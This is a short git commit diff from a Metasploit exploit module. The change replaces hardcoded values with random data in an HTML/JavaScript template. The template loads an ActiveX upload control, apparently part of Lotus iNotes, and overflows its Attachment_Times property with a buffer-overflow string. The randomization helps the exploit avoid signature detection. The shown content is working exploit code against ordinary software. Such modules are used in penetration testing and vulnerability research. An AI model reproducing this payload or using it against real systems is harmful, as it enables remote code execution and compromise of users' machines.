swith to some random data

bug/bundler_fix
jvazquez-r7 2012-12-28 12:47:20 +01:00
parent af61438b0b
commit 8f62cd5561
1 changed files with 2 additions and 2 deletions

View File

@ -254,11 +254,11 @@ class Metasploit3 < Msf::Exploit::Remote
<body> <body>
<object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C"> <object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C">
<param name="General_Mode" value="1"> <param name="General_Mode" value="1">
<param name="General_URL" value="http://localhost/iNotes/Forms85.nsf/0/"> <param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
</object> </object>
<script> <script>
var bof = unescape("#{my_bof}"); var bof = unescape("#{my_bof}");
var my_time = "7/20/2011 11:01:42 "; var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
my_time += bof; my_time += bof;
my_time += " GMT"; my_time += " GMT";
UploadControl.Attachment_Times = my_time; UploadControl.Attachment_Times = my_time;